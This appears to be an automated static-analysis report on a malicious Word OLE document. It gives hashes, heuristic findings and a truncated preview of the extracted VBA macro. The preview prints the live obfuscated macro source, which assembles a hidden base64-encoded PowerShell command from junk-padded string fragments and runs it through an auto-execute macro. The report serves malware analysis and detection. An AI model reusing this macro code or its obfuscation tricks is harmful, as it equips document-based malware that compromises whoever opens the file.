Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 007e859ce0403b6e…

MALICIOUS

Office (OLE)

Size: 112.8 KB
Created: 2018-05-25 07:05:00
Authoring application: Microsoft Office Word
First seen: 2019-04-18
MD5: bae05f14ed147dd13ef2b084cfc6419b
SHA-1: a5dee5411ef78a09dd2bec901a468cb24cd83324
SHA-256: 007e859ce0403b6e51acdcae39e7e5e05f4ecf5f85efa23ffb904909baf112ab
Risk score: 182

Heuristics (6)

  • VBA macros detected (medium, 2 related findings) OLE_VBA_MACROS
    Document contains VBA macro code.
  • Shell() call in VBA (critical) OLE_VBA_SHELL
    Shell() call in VBA.
  • AutoOpen macro (high) OLE_VBA_AUTOOPEN
    AutoOpen macro.
  • OLE document has large unaccounted-for region (high) OLE_SLACK_ANOMALY
    OLE file is 115,456 bytes but its declared streams total only 36,047 bytes — 79,409 bytes (69%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename   | Kind      | Source                                                 | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source)    | 15765 bytes
SHA-256: bcd50a89f48155ac74d2eabe9cf4e7a68d105610e738d88c1851d8e298a30f52

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "zzckFrYYC"
Function OZBGiUw()
On Error Resume Next
rjKdt = wTJdAo - Cos(EjjIa) * 1 - Chr(2091) / 21700 - ChrB(zOwJH)
dTszz = 87180
ocPCSzVXI = "owersH" + "eLL -WinDow" + "sTyle " + "hidden -e I" + "AAuACgAKABnAG" + "UAVAAtA" + "HYAYQBy" + "AEkAQQBCAGw" + "AZQAgACc" + "AKgBtAEQAcgAqAC"
QHmLMs = zGduTc - Cos(oIVkSK) * 1 - Chr(98123) / 84957 - ChrB(LUmXS)
QiAvb = 77451
XziUj = "cAKQAuAG4AYQ" + "BNAEUA" + "WwAzACwAMQ" + "AxACwA" + "MgBdAC0AagBvA" + "EkAbgAnACcAKQAo" + "ACAAKA" + "AoACIAewAxADcA" + "fQB7ADEAMAB9AHs" + "ANAA3AH0A"
zwOIR = skEqi - Cos(oKXOjj) * 1 - Chr(84930) / 46250 - ChrB(arZVaz)
wtXBAP = 22323
jZpqOsawF = "ewAxADIANgB9AH" + "sANwAzAH0Aew" + "AzADEAfQ" + "B7ADkANAB" + "9AHsAMQAxAD"
WKsoz = HdIviq - Cos(PUMjQk) * 1 - Chr(43807) / 10370 - ChrB(mrLDmL)
dbZww = 85519
vGmKjHbzOr = "UAfQB7ADk" + "AOQB9AH" + "sANQA5AH" + "0AewA" + "xADAAMAB9AHs" + "AOQAwAH0Ae" + "wAzADcAf"
OZBGiUw = ocPCSzVXI + XziUj + jZpqOsawF + vGmKjHbzOr
End Function
Function UEWdJEAOsON()
On Error Resume Next
rDYGT = RawJw - Cos(ZLRkio) * 1 - Chr(37360) / 64912 - ChrB(Acvvv)
iTFru = 45208
nZZWSjTS = "QB7ADEAMgA0A" + "H0AewA3ADAAf" + "QB7ADIAMQB9A" + "HsAMAB9" + "AHsAMgA3A"
VfriDr = MuCGD - Cos(HLruJf) * 1 - Chr(20614) / 95780 - ChrB(bcLXCm)
rRCLb = 81410
TnbmfV = "H0Aew" + "A4ADYAfQB7AD" + "YAMQB9AHsAOQA4A" + "H0AewA" + "1ADUA"
sAlbKL = aprKD - Cos(cKhPM) * 1 - Chr(362) / 59404 - ChrB(OSjok)
DkEsK = 33068
msPQuEM = "fQB7A" + "DQAMAB9AHsANwB9" + "AHsAMQAwADYAf" + "QB7ADYAN" + "gB9AHs" + "AMwA4AH" + "0AewA1ADYAfQB7" + "ADgAMQB9AH" + "sAMQAxA"
wuYDA = jAnTNz - Cos(ijkmw) * 1 - Chr(52339) / 22013 - ChrB(ihFmZF)
qkwzm = 89196
IXXHUBarZ = "DQAfQB7ADIAN" + "gB9AHsANQA3A" + "H0AewA3ADQAf" + "QB7ADEAMgAxAH0" + "AewA3ADYAf" + "QB7ADEA" + "MAA3AH0AewA0A" + "DEAfQ"
QJLMOu = awSpR - Cos(WASujF) * 1 - Chr(82873) / 39249 - ChrB(TQajj)
DUNNY = 823
OMwkNnGjrJ = "B7ADYAMgB" + "9AHsA" + "NAA0AH0AewAxAD" + "EAMgB9AHsA" + "NwA5AH0AewAx" + "ADkAfQB7AD"
balMQ = DjmzIi - Cos(qSEQjD) * 1 - Chr(17734) / 8098 - ChrB(vmiOtX)
FbsbGY = 83805
uKIcNUipZJ = "YAfQB7AD" + "UAOAB9AHs" + "ANwA1AH0AewAxA" + "DIAMAB9AHs" + "AMQAyAH0Aew" + "A4ADQAfQB7A" + "DEAMQB" + "9AHsAMQ" + "A1AH0AewAxADQAf"
WpMQd = SRBATl - Cos(zhVrM) * 1 - Chr(72502) / 59851 - ChrB(iCkjEj)
PCaRa = 91740
HlFiOHTzd = "QB7ADEAM" + "QA4AH0AewAxAD" + "IANQB9AHsAO" + "AA4AH0Aew" + "AxADAAMwB9A" + "HsAMQAx" + "ADMAfQB7" + "ADEAMQA5AH0AewA" + "4ADkAfQB7"
qqsaIc = jNZmN - Cos(uXkun) * 1 - Chr(23961) / 18591 - ChrB(mckYAw)
zaCKU = 6857
rZisqw = "ADcAMQB9AH" + "sANgA5AH0" + "AewA2ADUAfQB7" + "ADQAOAB9AHsA"
fwldCi = pKurZc - Cos(SfiOmC) * 1 - Chr(7937) / 26442 - ChrB(CHjRj)
XbtEDs = 72163
ZqRPLwT = "OAA1A" + "H0AewA0ADUAfQB" + "7ADQANg" + "B9AHsAOQA1AH0Ae" + "wA4ADAAfQB7" + "ADgAMwB9AHsAMgA" + "wAH0Aew" + "AxADEAMAB9AHsAN"
JKitz = qhbUK - Cos(uYwiBm) * 1 - Chr(33354) / 82082 - ChrB(VWMRCn)
zVYzj = 44287
KohfU = "QAwAH0A" + "ewAxADEAMQ" + "B9AHsANw" + "AyAH0AewA" + "xADEANgB9A" + "HsAMQAyADMAfQB7" + "ADEAfQB" + "7ADMAOQB9AHsA" + "MwB9AHsA" + "NQA0AH0AewAzAD"
UEWdJEAOsON = nZZWSjTS + TnbmfV + msPQuEM + IXXHUBarZ + OMwkNnGjrJ + uKIcNUipZJ + HlFiOHTzd + rZisqw + ZqRPLwT + KohfU
End Function
Function NujwnRHpS()
On Error Resume Next
EHJGv = VjLHz - Cos(zfKCRb) * 1 - Chr(90080) / 51031 - ChrB(nSbviX)
GvLAXD = 85114
iKEpKhunPCJ = "MAfQB7" + "ADUAfQB7AD" + "QAMwB9AHsAMg" + "AzAH0Aew" + "AxADA" + "AMgB9AHsAOQB9A" + "HsAOQAzAH0AewA" + "5ADcAfQ" + "B7ADUAMgB9AHs" + "ANgA4A"
sfVYMo = FSJon - Cos(SGYlwj) * 1 - Chr(31306) / 78730 - ChrB(KRumaQ)
zUwmjK = 72233
zIVKtJOdEC = "H0Aew" + "A0ADkAfQB7" + "ADEAM" + "gAyAH0Ae"
WNzdM = lqjwn - Cos(nObWbm) * 1 - Chr(20414) / 40608 - ChrB(daOuK)
psBDH = 41176
ibwqCP = "wAzADQAfQB7A" + "DYAMAB9AHsA" + "MQAzAH0A" + "ewA1A" + "DEAfQB7"
Pihmc = ZbLpm - Cos(IktZKw) * 1 - Chr(190) / 31632 - ChrB(smljC)
wzisjT = 39918
GwWwaqwrXz = "ADkAMgB9AHsA" + "MwAyAH0AewA0ADI" + "AfQB7A" + "DMANgB9AHsAOQA2" + "AH0AewAxADgAfQB" + "7ADgA" + "NwB9AHsA" + "MQAwADE" + "AfQB7ADUAMwB9AH" + "sAMQA"
sppJmv = SkbSBi - Cos(SqGHEQ) * 1 - Chr(444
... (truncated)